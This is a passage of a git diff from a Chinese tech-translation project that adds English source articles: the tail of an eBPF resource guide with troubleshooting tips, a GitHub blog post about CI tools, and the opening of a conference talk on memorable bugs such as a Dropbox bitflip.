iproute2/tc/tc_bpf.c, where you may find the same code in older versions of the package). + +### BPF utilities + +The kernel also ships the sources of three tools (`bpf_asm.c`, `bpf_dbg.c`, `bpf_jit_disasm.c`) related to BPF, under the [linux/tools/net/][179] or [linux/tools/bpf/][180] directory depending on your version: + +* `bpf_asm` is a minimal cBPF assembler. + +* `bpf_dbg` is a small debugger for cBPF programs. + +* `bpf_jit_disasm` is generic for both BPF flavors and could be highly useful for JIT debugging. + +* `bpftool` is a generic utility written by Jakub Kicinski, and that can be used to interact with eBPF programs and maps from userspace, for example to show, dump, pin programs, or to show, create, pin, update, delete maps. + +Read the comments at the top of the source files to get an overview of their usage. + +### Other interesting chunks + +If you are interested the use of less common languages with BPF, bcc contains [a **P4 compiler** for BPF targets][181] as well as [a **Lua front-end**][182] that can be used as alternatives to the C subset and (in the case of Lua) to the Python tools. + +### LLVM backend + +The BPF backend used by clang / LLVM for compiling C into eBPF was added to the LLVM sources in[this commit][183] (and can also be accessed on [the GitHub mirror][184]). + +### Running in userspace + +As far as I know there are at least two eBPF userspace implementations. The first one, [uBPF][185], is written in C. It contains an interpreter, a JIT compiler for x86_64 architecture, an assembler and a disassembler. + +The code of uBPF seems to have been reused to produce a [generic implementation][186], that claims to support FreeBSD kernel, FreeBSD userspace, Linux kernel, Linux userspace and MacOSX userspace. It is used for the [BPF extension module for VALE switch][187]. + +The other userspace implementation is my own work: [rbpf][188], based on uBPF, but written in Rust. The interpreter and JIT-compiler work (both under Linux, only the interpreter for MacOSX and Windows), there may be more in the future. + +### Commit logs + +As stated earlier, do not hesitate to have a look at the commit log that introduced a particular BPF feature if you want to have more information about it. You can search the logs in many places, such as on [git.kernel.org][189], [on GitHub][190], or on your local repository if you have cloned it. If you are not familiar with git, try things like `git blame ` to see what commit introduced a particular line of code, then `git show ` to have details (or search by keyword in `git log` results, but this may be tedious). See also [the list of eBPF features per kernel version][191] on bcc repository, that links to relevant commits. + +![](https://qmonnet.github.io/whirl-offload/img/icons/wand.svg) + +### Troubleshooting + +The enthusiasm about eBPF is quite recent, and so far I have not found a lot of resources intending to help with troubleshooting. So here are the few I have, augmented with my own recollection of pitfalls encountered while working with BPF. + +### Errors at compilation time + +* Make sure you have a recent enough version of the Linux kernel (see also [this document][127]). + +* If you compiled the kernel yourself: make sure you installed correctly all components, including kernel image, headers and libc. + +* When using the `bcc` shell function provided by `tc-bpf` man page (to compile C code into BPF): I once had to add includes to the header for the clang call: + + ``` + __bcc() { + clang -O2 -I "/usr/src/linux-headers-$(uname -r)/include/" \ + -I "/usr/src/linux-headers-$(uname -r)/arch/x86/include/" \ + -emit-llvm -c $1 -o - | \ + llc -march=bpf -filetype=obj -o "`basename $1 .c`.o" + } + + ``` + + (seems fixed as of today). + +* For other problems with `bcc`, do not forget to have a look at [the FAQ][128] of the tool set. + +* If you downloaded the examples from the iproute2 package in a version that does not exactly match your kernel, some errors can be triggered by the headers included in the files. The example snippets indeed assume that the same version of iproute2 package and kernel headers are installed on the system. If this is not the case, download the correct version of iproute2, or edit the path of included files in the examples to point to the headers included in iproute2 (some problems may or may not occur at runtime, depending on the features in use). + +### Errors at load and run time + +* To load a program with tc, make sure you use a tc binary coming from an iproute2 version equivalent to the kernel in use. + +* To load a program with bcc, make sure you have bcc installed on the system (just downloading the sources to run the Python script is not enough). + +* With tc, if the BPF program does not return the expected values, check that you called it in the correct fashion: filter, or action, or filter with “direct-action” mode. + +* With tc still, note that actions cannot be attached directly to qdiscs or interfaces without the use of a filter. + +* The errors thrown by the in-kernel verifier may be hard to interpret. [The kernel documentation][129]may help, so may [the reference guide][130] or, as a last resort, the source code (see above) (good luck!). For this kind of errors it is also important to keep in mind that the verifier  _does not run_  the program. If you get an error about an invalid memory access or about uninitialized data, it does not mean that these problems actually occurred (or sometimes, that they can possibly occur at all). It means that your program is written in such a way that the verifier estimates that such errors could happen, and therefore it rejects the program. + +* Note that `tc` tool has a verbose mode, and that it works well with BPF: try appending `verbose`at the end of your command line. + +* bcc also has verbose options: the `BPF` class has a `debug` argument that can take any combination of the three flags `DEBUG_LLVM_IR`, `DEBUG_BPF` and `DEBUG_PREPROCESSOR` (see details in [the source file][131]). It even embeds [some facilities to print output messages][132] for debugging the code. + +* LLVM v4.0+ [embeds a disassembler][133] for eBPF programs. So if you compile your program with clang, adding the `-g` flag for compiling enables you to later dump your program in the rather human-friendly format used by the kernel verifier. To proceed to the dump, use: + + ``` + $ llvm-objdump -S -no-show-raw-insn bpf_program.o + + ``` + +* Working with maps? You want to have a look at [bpf-map][134], a very userful tool in Go created for the Cilium project, that can be used to dump the contents of kernel eBPF maps. There also exists [a clone][135] in Rust. + +* There is an old [`bpf` tag on **StackOverflow**][136], but as of this writing it has been hardly used—ever (and there is nearly nothing related to the new eBPF version). If you are a reader from the Future though, you may want to check whether there has been more activity on this side. + +![](https://qmonnet.github.io/whirl-offload/img/icons/zoomin.svg) + +### And still more! + +* In case you would like to easily **test XDP**, there is [a Vagrant setup][137] available. You can also **test bcc**[in a Docker container][138]. + +* Wondering where the **development and activities** around BPF occur? Well, the kernel patches always end up [on the netdev mailing list][139] (related to the Linux kernel networking stack development): search for “BPF” or “XDP” keywords. Since April 2017, there is also [a mailing list specially dedicated to XDP programming][140] (both for architecture or for asking for help). Many discussions and debates also occur [on the IO Visor mailing list][141], since BPF is at the heart of the project. If you only want to keep informed from time to time, there is also an [@IOVisor Twitter account][142]. + +And come back on this blog from time to time to see if they are new articles [about BPF][192]! + + _Special thanks to Daniel Borkmann for the numerous [additional documents][154] he pointed to me so that I could complete this collection._ + +-------------------------------------------------------------------------------- + +via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ + +作者:[Quentin Monnet ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://qmonnet.github.io/whirl-offload/about/ +[1]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf +[2]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp +[3]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-other-components-related-or-based-on-ebpf +[4]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf-1 +[5]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-tc +[6]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 +[7]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-p4-and-bpf +[8]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-the-kernel +[9]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-package-iproute2 +[10]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-bcc-set-of-tools +[11]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#manual-pages +[12]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-code-in-the-kernel +[13]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#xdp-hooks-code +[14]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-logic-in-bcc +[15]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#code-to-manage-bpf-with-tc +[16]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-utilities +[17]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#other-interesting-chunks +[18]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#llvm-backend +[19]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#running-in-userspace +[20]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#commit-logs +[21]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-compilation-time +[22]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-load-and-run-time +[23]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#generic-presentations +[24]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#documentation +[25]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#tutorials +[26]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#examples +[27]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#the-code +[28]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#troubleshooting +[29]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#and-still-more +[30]:http://netdevconf.org/1.2/session.html?daniel-borkmann +[31]:http://netdevconf.org/1.2/slides/oct5/07_tcws_daniel_borkmann_2016_tcws.pdf +[32]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop +[33]:http://www.netdevconf.org/1.1/proceedings/slides/borkmann-tc-classifier-cls-bpf.pdf +[34]:http://www.netdevconf.org/1.1/proceedings/papers/On-getting-tc-classifier-fully-programmable-with-cls-bpf.pdf +[35]:https://archive.fosdem.org/2016/schedule/event/ebpf/attachments/slides/1159/export/events/attachments/ebpf/slides/1159/ebpf.pdf +[36]:https://fosdem.org/2017/schedule/event/ebpf_xdp/ +[37]:http://people.netfilter.org/hawk/presentations/xdp2016/xdp_intro_and_use_cases_sep2016.pdf +[38]:http://netdevconf.org/1.2/session.html?jesper-performance-workshop +[39]:http://people.netfilter.org/hawk/presentations/OpenSourceDays2017/XDP_DDoS_protecting_osd2017.pdf +[40]:http://people.netfilter.org/hawk/presentations/MM-summit2017/MM-summit2017-JesperBrouer.pdf +[41]:http://netdevconf.org/2.1/session.html?gospodarek +[42]:http://jvns.ca/blog/2017/04/07/xdp-bpf-tutorial/ +[43]:http://www.slideshare.net/ThomasGraf5/clium-container-networking-with-bpf-xdp +[44]:http://www.slideshare.net/Docker/cilium-bpf-xdp-for-containers-66969823 +[45]:https://www.youtube.com/watch?v=TnJF7ht3ZYc&list=PLkA60AVN3hh8oPas3cq2VA9xB7WazcIgs +[46]:http://www.slideshare.net/ThomasGraf5/cilium-fast-ipv6-container-networking-with-bpf-and-xdp +[47]:https://fosdem.org/2017/schedule/event/cilium/ +[48]:http://openvswitch.org/support/ovscon2016/7/1120-tu.pdf +[49]:http://openvswitch.org/support/ovscon2016/7/1245-bertrone.pdf +[50]:https://www.spinics.net/lists/xdp-newbies/msg00179.html +[51]:https://www.spinics.net/lists/xdp-newbies/msg00181.html +[52]:https://www.spinics.net/lists/xdp-newbies/msg00185.html +[53]:http://schd.ws/hosted_files/ossna2017/da/BPFandXDP.pdf +[54]:https://speakerdeck.com/tuxology/the-bsd-packet-filter +[55]:http://www.slideshare.net/brendangregg/bpf-tracing-and-more +[56]:http://fr.slideshare.net/brendangregg/linux-bpf-superpowers +[57]:https://www.socallinuxexpo.org/sites/default/files/presentations/Room%20211%20-%20IOVisor%20-%20SCaLE%2014x.pdf +[58]:https://events.linuxfoundation.org/sites/events/files/slides/ebpf_on_the_mainframe_lcon_2015.pdf +[59]:https://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf +[60]:https://events.linuxfoundation.org/sites/events/files/slides/bpf_collabsummit_2015feb20.pdf +[61]:https://lwn.net/Articles/603983/ +[62]:http://www.slideshare.net/vh21/meet-cutebetweenebpfandtracing +[63]:http://www.slideshare.net/vh21/linux-kernel-tracing +[64]:http://www.slideshare.net/ThomasGraf5/linux-networking-explained +[65]:http://www.slideshare.net/ThomasGraf5/linuxcon-2015-linux-kernel-networking-walkthrough +[66]:http://www.tcpdump.org/papers/bpf-usenix93.pdf +[67]:http://www.gsp.com/cgi-bin/man.cgi?topic=bpf +[68]:http://borkmann.ch/talks/2013_devconf.pdf +[69]:http://borkmann.ch/talks/2014_devconf.pdf +[70]:https://blog.cloudflare.com/introducing-the-bpf-tools/ +[71]:http://biot.com/capstats/bpf.html +[72]:https://www.iovisor.org/technology/xdp +[73]:https://github.com/iovisor/bpf-docs/raw/master/Express_Data_Path.pdf +[74]:https://events.linuxfoundation.org/sites/events/files/slides/iovisor-lc-bof-2016.pdf +[75]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 +[76]:http://netdevconf.org/1.2/session.html?herbert-xdp-workshop +[77]:https://schd.ws/hosted_files/2016p4workshop/1d/Intel%20Fastabend-P4%20on%20the%20Edge.pdf +[78]:https://ovsorbit.benpfaff.org/#e11 +[79]:http://open-nfp.org/media/pdfs/Open_NFP_P4_EBPF_Linux_TC_Offload_FINAL.pdf +[80]:https://opensource.googleblog.com/2016/11/cilium-networking-and-security.html +[81]:https://ovsorbit.benpfaff.org/ +[82]:http://blog.ipspace.net/2016/10/fast-linux-packet-forwarding-with.html +[83]:http://netdevconf.org/2.1/session.html?bertin +[84]:http://netdevconf.org/2.1/session.html?zhou +[85]:http://www.slideshare.net/IOVisor/ceth-for-xdp-linux-meetup-santa-clara-july-2016 +[86]:http://info.iet.unipi.it/~luigi/vale/ +[87]:https://github.com/YutaroHayakawa/vale-bpf +[88]:https://www.stamus-networks.com/2016/09/28/suricata-bypass-feature/ +[89]:http://netdevconf.org/1.2/slides/oct6/10_suricata_ebpf.pdf +[90]:https://www.slideshare.net/ennael/kernel-recipes-2017-ebpf-and-xdp-eric-leblond +[91]:https://github.com/iovisor/bpf-docs/blob/master/university/sigcomm-ccr-InKev-2016.pdf +[92]:https://fosdem.org/2017/schedule/event/go_bpf/ +[93]:https://wkz.github.io/ply/ +[94]:https://www.kernel.org/doc/Documentation/networking/filter.txt +[95]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/Documentation/bpf/bpf_design_QA.txt?id=2e39748a4231a893f057567e9b880ab34ea47aef +[96]:https://github.com/iovisor/bpf-docs/blob/master/eBPF.md +[97]:https://github.com/iovisor/bcc/tree/master/docs +[98]:https://github.com/iovisor/bpf-docs/ +[99]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[100]:http://man7.org/linux/man-pages/man2/bpf.2.html +[101]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html +[102]:https://prototype-kernel.readthedocs.io/en/latest/bpf/index.html +[103]:http://docs.cilium.io/en/latest/bpf/ +[104]:https://ferrisellis.com/tags/ebpf/ +[105]:http://linux-ip.net/articles/Traffic-Control-HOWTO/ +[106]:http://lartc.org/lartc.html +[107]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/man/man8 +[108]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc?h=v4.13.0 +[109]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc/actions?h=v4.13.0 +[110]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop +[111]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/commit/bash-completion/tc?id=27d44f3a8a4708bcc99995a4d9b6fe6f81e3e15b +[112]:https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/index.html +[113]:https://marc.info/?l=linux-netdev&m=147436253625672 +[114]:http://docs.cilium.io/en/latest/bpf/ +[115]:https://github.com/iovisor/bcc/blob/master/INSTALL.md +[116]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/bpf.h +[117]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/bpf.h +[118]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/filter.h +[119]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/filter.h +[120]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/bpf +[121]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/filter.c +[122]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/arch/x86/net/bpf_jit_comp.c +[123]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/sched +[124]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/trace/bpf_trace.c +[125]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/seccomp.c +[126]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/testing/selftests/seccomp/seccomp_bpf.c +[127]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[128]:https://github.com/iovisor/bcc/blob/master/FAQ.txt +[129]:https://www.kernel.org/doc/Documentation/networking/filter.txt +[130]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[131]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py +[132]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md#output +[133]:https://www.spinics.net/lists/netdev/msg406926.html +[134]:https://github.com/cilium/bpf-map +[135]:https://github.com/badboy/bpf-map +[136]:https://stackoverflow.com/questions/tagged/bpf +[137]:https://github.com/iovisor/xdp-vagrant +[138]:https://github.com/zlim/bcc-docker +[139]:http://lists.openwall.net/netdev/ +[140]:http://vger.kernel.org/vger-lists.html#xdp-newbies +[141]:http://lists.iovisor.org/pipermail/iovisor-dev/ +[142]:https://twitter.com/IOVisor +[143]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#what-is-bpf +[144]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#dive-into-the-bytecode +[145]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#resources +[146]:https://github.com/qmonnet/whirl-offload/commits/gh-pages/_posts/2016-09-01-dive-into-bpf.md +[147]:http://netdevconf.org/1.2/session.html?jakub-kicinski +[148]:http://www.slideshare.net/IOVisor/express-data-path-linux-meetup-santa-clara-july-2016 +[149]:https://cdn.shopify.com/s/files/1/0177/9886/files/phv2017-gbertin.pdf +[150]:https://github.com/cilium/cilium +[151]:https://fosdem.org/2017/schedule/event/stateful_ebpf/ +[152]:http://vger.kernel.org/vger-lists.html#xdp-newbies +[153]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[154]:https://github.com/qmonnet/whirl-offload/commit/d694f8081ba00e686e34f86d5ee76abeb4d0e429 +[155]:http://openvswitch.org/pipermail/dev/2014-October/047421.html +[156]:https://qmonnet.github.io/whirl-offload/2016/07/15/beba-research-project/ +[157]:https://www.iovisor.org/resources/blog +[158]:http://www.brendangregg.com/blog/2016-03-05/linux-bpf-superpowers.html +[159]:http://p4.org/ +[160]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4 +[161]:https://github.com/p4lang/p4c/blob/master/backends/ebpf/README.md +[162]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[163]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md +[164]:https://github.com/goldshtn/linux-tracing-workshop +[165]:https://blog.yadutaf.fr/2017/07/28/tracing-a-packet-journey-using-linux-tracepoints-perf-ebpf/ +[166]:https://open-nfp.org/dataplanes-ebpf/technical-papers/ +[167]:http://netdevconf.org/2.1/session.html?gospodarek +[168]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/samples/bpf +[169]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/examples/bpf +[170]:https://github.com/iovisor/bcc/tree/master/examples +[171]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html +[172]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/dev.c +[173]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/drivers/net/ethernet/mellanox/mlx4/ +[174]:https://github.com/iovisor/bcc/ +[175]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py +[176]:https://github.com/iovisor/bcc/blob/master/src/cc/libbpf.c +[177]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/tc +[178]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/lib/bpf.c +[179]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/net +[180]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/tools/bpf +[181]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4/compiler +[182]:https://github.com/iovisor/bcc/tree/master/src/lua +[183]:https://reviews.llvm.org/D6494 +[184]:https://github.com/llvm-mirror/llvm/commit/4fe85c75482f9d11c5a1f92a1863ce30afad8d0d +[185]:https://github.com/iovisor/ubpf/ +[186]:https://github.com/YutaroHayakawa/generic-ebpf +[187]:https://github.com/YutaroHayakawa/vale-bpf +[188]:https://github.com/qmonnet/rbpf +[189]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git +[190]:https://github.com/torvalds/linux +[191]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[192]:https://qmonnet.github.io/whirl-offload/categories/#BPF diff --git a/sources/tech/20171107 GitHub welcomes all CI tools.md b/sources/tech/20171107 GitHub welcomes all CI tools.md new file mode 100644 index 0000000000..7bef351bd6 --- /dev/null +++ b/sources/tech/20171107 GitHub welcomes all CI tools.md @@ -0,0 +1,95 @@ +translating---geekpi + +GitHub welcomes all CI tools +==================== + + +[![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] + +Continuous Integration ([CI][12]) tools help you stick to your team's quality standards by running tests every time you push a new commit and [reporting the results][13] to a pull request. Combined with continuous delivery ([CD][14]) tools, you can also test your code on multiple configurations, run additional performance tests, and automate every step [until production][15]. + +There are several CI and CD tools that [integrate with GitHub][16], some of which you can install in a few clicks from [GitHub Marketplace][17]. With so many options, you can pick the best tool for the job—even if it's not the one that comes pre-integrated with your system. + +The tools that will work best for you depends on many factors, including: + +* Programming language and application architecture + +* Operating system and browsers you plan to support + +* Your team's experience and skills + +* Scaling capabilities and plans for growth + +* Geographic distribution of dependent systems and the people who use them + +* Packaging and delivery goals + +Of course, it isn't possible to optimize your CI tool for all of these scenarios. The people who build them have to choose which use cases to serve best—and when to prioritize complexity over simplicity. For example, if you like to test small applications written in a particular programming language for one platform, you won't need the complexity of a tool that tests embedded software controllers on dozens of platforms with a broad mix of programming languages and frameworks. + +If you need a little inspiration for which CI tool might work best, take a look at [popular GitHub projects][18]. Many show the status of their integrated CI/CD tools as badges in their README.md. We've also analyzed the use of CI tools across more than 50 million repositories in the GitHub community, and found a lot of variety. The following diagram shows the relative percentage of the top 10 CI tools used with GitHub.com, based on the most used [commit status contexts][19] used within our pull requests. + + _Our analysis also showed that many teams use more than one CI tool in their projects, allowing them to emphasize what each tool does best._ + + [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] + +If you'd like to check them out, here are the top 10 tools teams use: + +* [Travis CI][1] + +* [Circle CI][2] + +* [Jenkins][3] + +* [AppVeyor][4] + +* [CodeShip][5] + +* [Drone][6] + +* [Semaphore CI][7] + +* [Buildkite][8] + +* [Wercker][9] + +* [TeamCity][10] + +It's tempting to just pick the default, pre-integrated tool without taking the time to research and choose the best one for the job, but there are plenty of [excellent choices][21] built for your specific use cases. And if you change your mind later, no problem. When you choose the best tool for a specific situation, you're guaranteeing tailored performance and the freedom of interchangability when it no longer fits. + +Ready to see how CI tools can fit into your workflow? + +[Browse GitHub Marketplace][22] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2463-github-welcomes-all-ci-tools + +作者:[jonico ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/jonico +[1]:https://travis-ci.org/ +[2]:https://circleci.com/ +[3]:https://jenkins.io/ +[4]:https://www.appveyor.com/ +[5]:https://codeship.com/ +[6]:http://try.drone.io/ +[7]:https://semaphoreci.com/ +[8]:https://buildkite.com/ +[9]:http://www.wercker.com/ +[10]:https://www.jetbrains.com/teamcity/ +[11]:https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png +[12]:https://en.wikipedia.org/wiki/Continuous_integration +[13]:https://github.com/blog/2051-protected-branches-and-required-status-checks +[14]:https://en.wikipedia.org/wiki/Continuous_delivery +[15]:https://developer.github.com/changes/2014-01-09-preview-the-new-deployments-api/ +[16]:https://github.com/works-with/category/continuous-integration +[17]:https://github.com/marketplace/category/continuous-integration +[18]:https://github.com/explore?trending=repositories#trending +[19]:https://developer.github.com/v3/repos/statuses/ +[20]:https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png +[21]:https://github.com/works-with/category/continuous-integration +[22]:https://github.com/marketplace/category/continuous-integration diff --git a/sources/tech/20171112 Love Your Bugs.md b/sources/tech/20171112 Love Your Bugs.md new file mode 100644 index 0000000000..bf79f27cf7 --- /dev/null +++ b/sources/tech/20171112 Love Your Bugs.md @@ -0,0 +1,311 @@ +Love Your Bugs +============================================================ + +In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2]. + +### I love bugs + +I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer. + +But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction. + +Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too. + +### Bug #1 + +Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers. + + + +``` + +--------------+ +---------------+ + | | | | + | METASERVER | | BLOCKSERVER | + | | | | + +-+--+---------+ +---------+-----+ + ^ | ^ + | | | + | | +----------+ | + | +---> | | | + | | CLIENT +--------+ + +--------+ | + +----------+ +``` + + +Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves. + +Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded. + +So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver. + + +``` + +--------------+ +---------------+ + | | | | + | METASERVER | | BLOCKSERVER | + | | | | + +-+--+---------+ +---------+-----+ + ^ | ^ + | | 'ok, ok, need' | +'abcd,deef,efgh' | | +----------+ | efgh: [contents] + | +---> | | | + | | CLIENT +--------+ + +--------+ | + +----------+ +``` + + + +That’s the setup. So here’s the bug. + + + +``` + +--------------+ + | | + | METASERVER | + | | + +-+--+---------+ + ^ | + | | '???' +'abcdldeef,efgh' | | +----------+ + ^ | +---> | | + ^ | | CLIENT + + +--------+ | + +----------+ +``` + +Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense. + +If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position: + + +``` +l \x0c < $ ( . - +``` + +The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented: + +``` +bin(ord(',')): 0101100 +bin(ord('l')): 1101100 +``` + +You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage. + +And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped. + + + +``` +, : 0101100 +l : 1101100 +\x0c : 0001100 +< : 0111100 +$ : 0100100 +( : 0101000 +. : 0101110 +- : 0101101 +``` + + +### Bitflips are real! + +I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common. + +You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this. + +Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no 